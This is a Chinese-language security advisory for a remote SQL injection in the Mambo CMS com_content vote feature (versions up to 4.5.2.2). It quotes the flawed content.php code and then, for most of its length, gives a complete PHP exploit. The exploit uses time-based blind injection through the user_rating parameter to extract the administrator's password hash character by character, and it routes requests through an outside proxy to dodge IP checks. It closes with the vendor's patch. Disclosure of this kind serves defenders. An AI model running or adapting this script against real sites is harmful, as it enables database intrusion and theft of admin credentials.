Mambo com_content远程SQL注入漏洞
2005-08-18
系统编号:
WAVDB-00532
BUGTRAQ: 13966
影响版本:
Mambo Open Source <= 4.5.2.2
程序介绍:
Mambo是一款开放源代码的WEB内容管理系统。
漏洞分析:
Mambo的com_contents中存在严重的SQL注入漏洞,远程攻击者可能利用此漏洞非法操作数据库。
-- content.php --
100 case 'vote':
101 recordVote ( $url , $user_rating , $cid ,
$database);
102 break;
...
1478 $query = UPDATE
#__content_rating
1479 . \n SET rating_count =
rating_count + 1,
1450 . \n rating_sum = rating_sum
+ $user_rating,
1451 . \n lastip = '$currip'
1452 . \n WHERE content_id = . $cid
1453 ;
----------------
在1450行$user_rating未经任何验证便使用用户提供的数据,导致用户可以获得敏感信息。
漏洞利用:
*/
if (!(function_exists('curl_init'))) {
echo cURL extension required\n ;
exit;
}
ini_set( max_execution_time , 999999 );
$benchcount = 150000;
$aid= 62;
$cid = 2;
$charmap = array (48,49,50,51,52,53,54,55,56,57,
97,98,99,100,101,102,
103,104,105,
106,107,108,109,110,111,112,113,
114,115,116,117,118,119,120,121,122
);
if($argv[1]){
$url = $argv[1];
if ($argv[2])
$aid = $argv[2];
if ($argv[3])
$benchcount = $argv[3];
if ($argv[4])
$proxy = $argv[4];
}
else {
echo Usage: .$argv[0]. <URL> [userid] [benchmarkcount] [proxy]\n\n ;
echo \tURL\t URL to mambo site (ex: http://127.0.0.1)\n ;
echo \taid\t userid to get (default: 62 (admin))\n ;
echo \tbenchmarkcount\t benchmark count (default: 150000)\n ;
echo \tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n ;
exit;
}
// rate from different ip (using http://projectbypass.com)
$projectbypass = http://projectbypass.com/nph-proxy3.cgi/010110A/ ;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace( :// , / ,$url). /index.php?op \
tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1 ); curl_setopt($ch, \
CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);
curl_close ($ch);
// standard page loading time
$start = time();
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($ch);
curl_close ($ch);
$stop = time();
$sloadtime = floatval($stop - $start);
echo standard page loading = .$sloadtime. \n ;
// benchmark page loading time
$start = time();
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url. /index.php?option=com_content&task=vote&id=1&Itemid \
=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ \
benchcount,md5(1)),1))+where+content_id=$cid/* ); curl_setopt($ch, \
CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);
curl_close ($ch);
$stop = time();
$bloadtime = floatval($stop - $start);
echo bencmark page loading = .$bloadtime. \n ;
// check if SQL query failed
if (ereg( DB function failed ,$res)){
echo [x] mysql < 4.1 detected - not exploitable\n ;
exit();
}
if ($bloadtime <= $sloadtime + 2){
echo [x] increase your benchmark count\n ;
exit();
}
echo Take your time for Teh Tarik... please wait ...\n\n ;
echo Result:\n ;
echo \tUserid = $aid\n ;
echo \tPassword Hash = ;
// starting fetch password
$benchcount = $benchcount*2;
for($i= 1;$i< 33;$i++){
foreach ($charmap as $char){
$start = time();
echo chr($char);
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url. /index.php?option=com_content&task=vote&id=1&Item \
id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a \
nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co \
ntent_id=$cid/* ); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$stop = time();
$xloadtime = floatval($stop - $start);
if (floatval($xloadtime) > $bloadtime){
$hash .= chr($char);
break 1;
}
else {
echo chr(8);
}
if ($char == 103){
echo \n\n\tNot Vulnerable or Something wrong occur ...\n ;
exit;
}
}
}
echo \n ;
?>
解决方案:
厂商补丁:
Mambo
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载4.5.2.3版本:
http://mamboforge.net/frs/downlo ... 5.2.3-stable.tar.gz
信息来源:
<*来源:pokley (saleh@scan-associates.net)
al3ndaleeb (al3ndaleeb@uk2.net)
链接:http://marc.theaimsgroup.com/?l= ... 974124936&w=2
*>